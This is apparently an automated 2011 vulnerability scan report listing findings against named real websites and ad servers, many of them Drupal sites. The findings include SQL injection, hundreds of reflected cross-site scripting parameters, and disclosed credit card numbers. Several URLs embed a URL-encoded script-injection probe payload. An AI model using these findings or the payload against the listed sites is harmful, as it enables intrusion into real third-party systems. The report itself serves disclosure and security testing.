XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, DRUPAL Sites

Comment: As of this date, all these Sites use a vulnerable version of Drupal

Report generated by XSS.CX at Mon Sep 12 12:10:13 GMT-06:00 2011.


1. SQL injection

1.1. http://ciphertex.com/content/product-comparison [SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie]

1.2. http://ciphertex.com/content/product-comparison [__utma cookie]

1.3. http://www.ciphertex.com/themes/garland/minnelli/minnelli.css [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://4qinvite.4q.iperceptions.com/1.aspx [loc parameter]

2.2. http://ad.yieldmanager.com/rw [name of an arbitrarily supplied request parameter]

2.3. http://ad.yieldmanager.com/rw [qs parameter]

2.4. http://ad.yieldmanager.com/rw [title parameter]

2.5. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

2.7. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

2.8. http://adserving.cpxinteractive.com/st [ad_size parameter]

2.9. http://adserving.cpxinteractive.com/st [pop_frequency parameter]

2.10. http://adserving.cpxinteractive.com/st [pop_times parameter]

2.11. http://adserving.cpxinteractive.com/st [section parameter]

2.12. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

2.13. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

2.14. http://api.chartbeat.com/toppages/ [jsonp parameter]

2.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.16. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

2.17. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status [callback parameter]

2.18. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

2.19. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection [callback parameter]

2.20. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection [callback parameter]

2.21. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [REST URL parameter 8]

2.22. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

2.23. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

2.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

2.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

2.26. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

2.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

2.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

2.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

2.30. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

2.31. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [$ parameter]

2.32. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [q parameter]

2.33. http://choices.truste.com/ca [c parameter]

2.34. http://choices.truste.com/ca [cid parameter]

2.35. http://cm.npc-morris.overture.com/js_1_0/ [css_url parameter]

2.36. http://dailydeals.savannahnow.com/widgets/300x250 [REST URL parameter 2]

2.37. http://go.savannahnow.com/partner_json/search [jsonsp parameter]

2.38. http://go.savannahnow.com/partner_json/search [limit parameter]

2.39. http://go.savannahnow.com/partner_json/search [st parameter]

2.40. http://go.savannahnow.com/partner_json/search [when parameter]

2.41. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

2.42. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

2.43. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

2.44. http://js.revsci.net/gateway/gw.js [bpid parameter]

2.45. http://js.revsci.net/gateway/gw.js [csid parameter]

2.46. http://metrics.impactengine.com/rest/reveal/129534/5011/Expand_Content [REST URL parameter 3]

2.47. http://metrics.impactengine.com/rest/view/129534/5011/0 [REST URL parameter 3]

2.48. http://metrics.impactengine.com/rest/view/129534/5011/30 [REST URL parameter 3]

2.49. http://ms0.erovinmo.com/keywords/instrument.js [jsoncallback parameter]

2.50. http://ms4.erovinmo.com/keywords/instrument.js [jsoncallback parameter]

2.51. http://pglb.buzzfed.com/148250/91bc34b96eac101805574950b6644cc6 [callback parameter]

2.52. http://player.ooyala.com/player.js [autoplay parameter]

2.53. http://savannahnow.com/ [name of an arbitrarily supplied request parameter]

2.54. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685 [REST URL parameter 1]

2.55. http://video.fastcompany.com/companies/mansueto-digital/videos.rss [REST URL parameter 1]

2.56. http://www.ciphertex.com/misc/favicon.ico [REST URL parameter 1]

2.57. http://www.ciphertex.com/modules/system/defaults.css [REST URL parameter 1]

2.58. http://www.ciphertex.com/modules/system/maintenance.css [REST URL parameter 1]

2.59. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 1]

2.60. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 2]

2.61. http://www.ciphertex.com/modules/system/system.css [REST URL parameter 3]

2.62. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]

2.63. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]

2.64. http://www.ciphertex.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]

2.65. http://www.ciphertex.com/sites/all/modules/custom_module/ciphertex.js [REST URL parameter 5]

2.66. http://www.ciphertex.com/sites/all/modules/date/date_popup/themes/jquery.timeentry.css [REST URL parameter 5]

2.67. http://www.ciphertex.com/sites/all/modules/filefield/filefield.css [REST URL parameter 4]

2.68. http://www.ciphertex.com/sites/all/modules/galleria/inc/galleria.css [REST URL parameter 1]

2.69. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 1]

2.70. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 6]

2.71. http://www.ciphertex.com/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 1]

2.72. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 1]

2.73. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 3]

2.74. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 5]

2.75. http://www.ciphertex.com/sites/all/modules/tabs/drupal-tabs.css [REST URL parameter 1]

2.76. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 4]

2.77. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 6]

2.78. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 7]

2.79. http://www.ciphertex.com/sites/all/modules/ubercart/uc_attribute/uc_attribute.css [REST URL parameter 4]

2.80. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 1]

2.81. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 5]

2.82. http://www.ciphertex.com/sites/all/modules/ubercart/uc_product/uc_product.css [REST URL parameter 5]

2.83. http://www.ciphertex.com/sites/all/modules/views_accordion/views-accordion.css [REST URL parameter 3]

2.84. http://www.ciphertex.com/sites/default/files/banners/fose.jpg [REST URL parameter 3]

2.85. http://www.ciphertex.com/sites/default/files/banners/super_savings.jpg [REST URL parameter 3]

2.86. http://www.ciphertex.com/sites/default/files/hp.swf [REST URL parameter 1]

2.87. http://www.ciphertex.com/themes/garland/minnelli/minnelli.css [REST URL parameter 2]

2.88. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 2]

2.89. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 3]

2.90. http://www.fastcompany.com/ [name of an arbitrarily supplied request parameter]

2.91. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 1]

2.92. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 2]

2.93. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 3]

2.94. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 1]

2.95. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 2]

2.96. http://www.mtv.co.uk/misc/thickbox.css [REST URL parameter 2]

2.97. http://www.mtv.co.uk/modules/node/node.css [REST URL parameter 3]

2.98. http://www.mtv.co.uk/modules/system/defaults.css [REST URL parameter 3]

2.99. http://www.mtv.co.uk/modules/system/system.css [REST URL parameter 3]

2.100. http://www.mtv.co.uk/modules/user/user.css [REST URL parameter 3]

2.101. http://www.mtv.co.uk/sites/all/modules/cck/content.css [REST URL parameter 5]

2.102. http://www.mtv.co.uk/sites/all/modules/fckeditor/fckeditor.css [REST URL parameter 5]

2.103. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 1]

2.104. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 2]

2.105. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 3]

2.106. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 4]

2.107. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 5]

2.108. http://www.mtv.co.uk/sites/all/modules/mtv_videobrowse/mtv_videobrowse.css [REST URL parameter 5]

2.109. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus.css [REST URL parameter 5]

2.110. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus_default.css [REST URL parameter 5]

2.111. http://www.mtv.co.uk/sites/all/modules/top_tabs/top_tabs.css [REST URL parameter 5]

2.112. http://www.mtv.co.uk/sites/all/modules/user_optin/user_optin.css [REST URL parameter 5]

2.113. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/print.css [REST URL parameter 7]

2.114. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/screen.css [REST URL parameter 7]

2.115. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf [REST URL parameter 6]

2.116. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/blackberry.swf [REST URL parameter 6]

2.117. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/bodyform.swf [REST URL parameter 6]

2.118. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/nokiaSessions.swf [REST URL parameter 6]

2.119. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/seat.swf [REST URL parameter 6]

2.120. http://www.mtv.co.uk/sites/all/themes/mtvuk/subthemes/default_homepage/style.css [REST URL parameter 7]

2.121. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

2.122. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

2.123. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]

2.124. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]

2.125. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]

2.126. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]

2.127. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]

2.128. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]

2.129. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

2.130. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

2.131. http://www.popsugar.com/ajaxharness [REST URL parameter 1]

2.132. http://www.popsugar.com/ajaxharness [REST URL parameter 1]

2.133. http://www.popsugar.com/community/welcome [REST URL parameter 1]

2.134. http://www.popsugar.com/community/welcome [REST URL parameter 1]

2.135. http://www.popsugar.com/community/welcome [REST URL parameter 2]

2.136. http://www.popsugar.com/community/welcome [REST URL parameter 2]

2.137. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]

2.138. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]

2.139. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]

2.140. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]

2.141. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]

2.142. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]

2.143. http://adserving.cpxinteractive.com/st [Referer HTTP header]

2.144. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [ZEDOIDA cookie]

2.145. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [ZEDOIDA cookie]

3. Cleartext submission of password

3.1. http://www.digitaldollhouse.com/

3.2. http://www.digitaldollhouse.com/

3.3. http://www.fastcompany.com/

3.4. http://www.fastcompany.com/

3.5. http://www.nowpublic.com/

4. Session token in URL

4.1. http://bh.contextweb.com/bh/set.aspx

4.2. http://l.sharethis.com/pview

4.3. http://video.fastcompany.com/manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt

4.4. http://video.fastcompany.com/plugins/flowplayer.swf

4.5. http://www.facebook.com/extern/login_status.php

4.6. http://www.fastcompany.com/

5. Cookie without HttpOnly flag set

5.1. http://teamsugar.com/

5.2. http://a.tribalfusion.com/j.ad

5.3. http://a.visualrevenue.com/vr.js

5.4. http://ad.yieldmanager.com/iframe3

5.5. http://ad.yieldmanager.com/imp

5.6. http://ad.yieldmanager.com/pixel

5.7. http://ads.pointroll.com/PortalServe/

5.8. http://affiliates.lynda.com/42/510/50/

5.9. http://api.bizographics.com/v1/profile.redirect

5.10. http://apis.google.com/js/plusone.js

5.11. http://b.scorecardresearch.com/b

5.12. http://bh.contextweb.com/bh/set.aspx

5.13. http://btg.mtvnservices.com/aria/guid.html

5.14. http://c.statcounter.com/t.php

5.15. http://c13.statcounter.com/t.php

5.16. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

5.17. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

5.18. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

5.19. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

5.20. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

5.21. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

5.22. http://c7.zedo.com/utils/ecSet.js

5.23. http://cm.npc-morris.overture.com/js_1_0/

5.24. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

5.25. http://d.adroll.com/check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI

5.26. http://d.adroll.com/pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7

5.27. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

5.28. http://d7.zedo.com/img/bh.gif

5.29. http://d7.zedo.com/utils/ecSet.js

5.30. http://dts1.raasnet.com/dts/bizo/in

5.31. http://dts1.raasnet.com/dts/exelate/in

5.32. http://dts1.raasnet.com/dts/targus

5.33. http://f21.360tag.com/t6/1418/MTV/

5.34. http://image2.pubmatic.com/AdServer/Pug

5.35. http://imp.fetchback.com/serve/fb/adtag.js

5.36. http://imp.fetchback.com/serve/fb/imp

5.37. http://load.exelator.com/load/

5.38. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395

5.39. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502

5.40. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118

5.41. http://p.raasnet.com/partners/dfp

5.42. http://p.raasnet.com/partners/oxmap

5.43. http://p.raasnet.com/partners/pixel

5.44. http://p.raasnet.com/partners/universal/in

5.45. http://pixel.quantserve.com/api/segments.json

5.46. http://pixel.quantserve.com/pixel

5.47. http://pixel.rubiconproject.com/tap.php

5.48. http://rs.gwallet.com/r1/pixel/x420r5075003

5.49. http://usadmm.dotomi.com/dmm/servlet/dmm

5.50. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s71862144072074

5.51. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s88215071307387

6. Password field with autocomplete enabled

6.1. http://www.digitaldollhouse.com/

6.2. http://www.digitaldollhouse.com/

6.3. http://www.fastcompany.com/

6.4. http://www.fastcompany.com/

6.5. http://www.nowpublic.com/

7. Source code disclosure

8. Referer-dependent response

8.1. http://adserving.cpxinteractive.com/st

8.2. http://www.examiner.com/sites/all/modules/custom/pajito/widget/content/widget.js.php

9. Cross-domain POST

9.1. http://savannahnow.com/

9.2. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685

9.3. http://www.popsci.com/

10. Cookie scoped to parent domain

10.1. http://a.tribalfusion.com/j.ad

10.2. http://ads.pointroll.com/PortalServe/

10.3. http://api.bizographics.com/v1/profile.redirect

10.4. http://apis.google.com/js/plusone.js

10.5. http://b.scorecardresearch.com/b

10.6. http://bh.contextweb.com/bh/set.aspx

10.7. http://c.statcounter.com/t.php

10.8. http://c13.statcounter.com/t.php

10.9. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

10.10. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

10.11. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

10.12. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

10.13. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

10.14. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

10.15. http://c7.zedo.com/utils/ecSet.js

10.16. http://cm.npc-morris.overture.com/js_1_0/

10.17. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

10.18. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

10.19. http://d7.zedo.com/img/bh.gif

10.20. http://d7.zedo.com/utils/ecSet.js

10.21. http://dts1.raasnet.com/dts/bizo/in

10.22. http://dts1.raasnet.com/dts/exelate/in

10.23. http://dts1.raasnet.com/dts/targus

10.24. http://f21.360tag.com/t6/1418/MTV/

10.25. http://id.google.com/verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif

10.26. http://id.google.com/verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif

10.27. http://image2.pubmatic.com/AdServer/Pug

10.28. http://imp.fetchback.com/serve/fb/adtag.js

10.29. http://imp.fetchback.com/serve/fb/imp

10.30. http://load.exelator.com/load/

10.31. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395

10.32. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502

10.33. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118

10.34. http://p.raasnet.com/partners/dfp

10.35. http://p.raasnet.com/partners/oxmap

10.36. http://p.raasnet.com/partners/pixel

10.37. http://p.raasnet.com/partners/universal/in

10.38. http://pixel.quantserve.com/api/segments.json

10.39. http://pixel.quantserve.com/pixel

10.40. http://pixel.rubiconproject.com/tap.php

10.41. http://rs.gwallet.com/r1/pixel/x420r5075003

10.42. http://usadmm.dotomi.com/dmm/servlet/dmm

10.43. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s71862144072074

10.44. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s88215071307387

11. Cross-domain Referer leakage

11.1. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

11.2. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

11.3. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

11.4. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

11.5. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

11.6. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.7. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.8. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.9. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.10. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.11. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.12. http://ad.doubleclick.net/adj/n6747.popsci/home

11.13. http://ad.doubleclick.net/adj/n6747.popsci/home

11.14. http://ad.doubleclick.net/adj/n6747.popsci/home

11.15. http://ad.doubleclick.net/adj/n6747.popsci/home

11.16. http://ad.doubleclick.net/adj/n6747.popsci/home

11.17. http://ad.doubleclick.net/adj/n6747.popsci/home

11.18. http://ad.doubleclick.net/adj/uk.mtv/homepage

11.19. http://ad.doubleclick.net/adj/uk.mtv/homepage

11.20. http://ad.yieldmanager.com/iframe3

11.21. http://ads.bluelithium.com/st

11.22. http://ads.dotomi.com/ads_smokey_pure.php

11.23. http://ads.dotomi.com/ads_smokey_pure.php

11.24. http://ads.pointroll.com/PortalServe/

11.25. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js

11.26. http://btg.mtvnservices.com/aria/coda.html

11.27. http://choices.truste.com/ca

11.28. http://choices.truste.com/ca

11.29. http://cm.g.doubleclick.net/pixel

11.30. http://cm.g.doubleclick.net/pixel

11.31. http://cm.npc-morris.overture.com/js_1_0/

11.32. http://googleads.g.doubleclick.net/pagead/ads

11.33. http://googleads.g.doubleclick.net/pagead/ads

11.34. http://googleads.g.doubleclick.net/pagead/ads

11.35. http://googleads.g.doubleclick.net/pagead/ads

11.36. http://googleads.g.doubleclick.net/pagead/ads

11.37. http://l.yimg.com/zz/combo

11.38. http://p.raasnet.com/partners/universal/in

11.39. http://player.ooyala.com/player.js

11.40. http://player.popsugar.com/player.js

11.41. http://player.vimeo.com/video/19872101

11.42. http://seg.sharethis.com/getSegment.php

11.43. http://syndication.jobthread.com/jt/syndication/page.php

11.44. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737

11.45. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069

11.46. http://www.facebook.com/plugins/likebox.php

11.47. http://www.facebook.com/plugins/likebox.php

11.48. http://www.facebook.com/plugins/likebox.php

11.49. http://www.facebook.com/plugins/likebox.php

11.50. http://www.facebook.com/plugins/likebox.php

11.51. http://www.facebook.com/plugins/likebox.php

11.52. http://www.facebook.com/plugins/likebox.php

11.53. http://www.facebook.com/plugins/likebox.php

11.54. http://www.facebook.com/plugins/likebox.php

11.55. http://www.facebook.com/plugins/likebox.php

11.56. http://www.facebook.com/plugins/likebox.php

11.57. http://www.google.com/search

11.58. http://www.google.com/url

11.59. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

12. Cross-domain script include

12.1. http://67.23.1.124/omni/cdcc_mandelbrot_min_2.html

12.2. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

12.3. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

12.4. http://ad.yieldmanager.com/iframe3

12.5. http://advertising.yahoo.com/

12.6. http://drupalsn.com/

12.7. http://googleads.g.doubleclick.net/pagead/ads

12.8. http://mydirtbike.com/

12.9. http://player.vimeo.com/video/19872101

12.10. http://research.yahoo.com/

12.11. http://savannahnow.com/

12.12. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685

12.13. http://seg.sharethis.com/getSegment.php

12.14. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737

12.15. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069

12.16. http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html

12.17. http://www.digitaldollhouse.com/

12.18. http://www.dome9.com/

12.19. http://www.facebook.com/plugins/likebox.php

12.20. http://www.fastcompany.com/

12.21. http://www.mtv.co.uk/

12.22. http://www.nowpublic.com/

12.23. http://www.observer.com/

12.24. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php

12.25. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

12.26. http://www.popsci.com/

12.27. http://www.popsugar.com/community/welcome

12.28. http://www.symantec.com/connect/

13. Email addresses disclosed

13.1. http://drupal.org/node/101494

13.2. http://drupal.org/search/apachesolr_multisitesearch/xss%20sql%20injection

13.3. http://drupal.org/security-team

13.4. http://media26.onsugar.com/v645/static/js/scriptaculous-1.8.3/controls.js

13.5. http://mydirtbike.com/sites/all/libraries/colorbox/colorbox/jquery.colorbox-min.js

13.6. http://research.yahoo.com/themes/yresearch/style-1.1.css

13.7. http://research.yahoo.com/themes/yresearch/style_drupal.css

13.8. http://research.yahoo.com/themes/yresearch/style_edits-1.4.css

13.9. http://savannahnow.com/sites/default/files/js/js_20f1b99cfdc38a8ea7818ec0c877dbfe.js

13.10. http://static.nowpublic.net/sf_js/core_bc99f0856175_190.js

13.11. http://static.nowpublic.net/sf_js/fp_9668f20645c9_190.js

13.12. http://video.fastcompany.com/companies/mansueto-digital/videos.rss

13.13. http://w.sharethis.com/button/buttons.js

13.14. http://www.cargoh.com/sites/default/files/js/js_8a98a7cc05aa129e3debc64b291aa431.js

13.15. http://www.mtv.co.uk/misc/jquery-ui.min.js

13.16. http://www.observer.com/

13.17. http://www.popsci.com/

13.18. http://www.popsci.com/files/js/220b385f427499380964507975f14862.js

13.19. http://www.popsugar.com/ajaxharness

13.20. http://www.symantec.com/connect/

14. Private IP addresses disclosed

14.1. http://api.connect.facebook.com/static/v0.4/client_restserver.php

14.2. http://connect.facebook.net/en_US/all.js

14.3. http://connect.facebook.net/en_US/all.js

14.4. http://external.ak.fbcdn.net/safe_image.php

14.5. http://external.ak.fbcdn.net/safe_image.php

14.6. http://player.vimeo.com/video/19872101

14.7. http://static.ak.connect.facebook.com/connect.php

14.8. http://static.ak.connect.facebook.com/connect.php/en_US

14.9. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

14.10. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

14.11. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

14.12. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

14.13. http://www.facebook.com/ajax/connect/connect_widget.php

14.14. http://www.facebook.com/ajax/connect/connect_widget.php

14.15. http://www.facebook.com/ajax/connect/connect_widget.php

14.16. http://www.facebook.com/ajax/connect/connect_widget.php

14.17. http://www.facebook.com/ajax/connect/connect_widget.php

14.18. http://www.facebook.com/connect.php/js/FB.Share

14.19. http://www.facebook.com/extern/login_status.php

14.20. http://www.facebook.com/extern/login_status.php

14.21. http://www.facebook.com/extern/login_status.php

14.22. http://www.facebook.com/extern/login_status.php

14.23. http://www.facebook.com/extern/login_status.php

14.24. http://www.facebook.com/plugins/like.php

14.25. http://www.facebook.com/plugins/like.php

14.26. http://www.facebook.com/plugins/likebox.php

14.27. http://www.facebook.com/plugins/likebox.php

14.28. http://www.facebook.com/plugins/likebox.php

14.29. http://www.facebook.com/plugins/likebox.php

14.30. http://www.facebook.com/plugins/likebox.php

14.31. http://www.facebook.com/plugins/likebox.php

14.32. http://www.facebook.com/plugins/likebox.php

14.33. http://www.facebook.com/plugins/likebox.php

14.34. http://www.facebook.com/plugins/likebox.php

14.35. http://www.facebook.com/plugins/likebox.php

14.36. http://www.facebook.com/plugins/likebox.php

14.37. http://www.facebook.com/plugins/likebox.php

15. Credit card numbers disclosed

15.1. http://assets.newsinc.com/flash/widget_toppicks01ps2.xml

15.2. http://www.digitaldollhouse.com/

16. HTML does not specify charset

16.1. http://67.23.1.124/omni/cdcc_mandelbrot_min_2.html

16.2. http://ad.yieldmanager.com/iframe3

16.3. http://ad.yieldmanager.com/rw

16.4. http://ads.pointroll.com/PortalServe/

16.5. http://amch.questionmarket.com/adsc/d907755/101/908678/adscout.php

16.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.7. http://c14.zedo.com/OzoDB/cutils/R53_7_7/jsc/1545/zpu.html

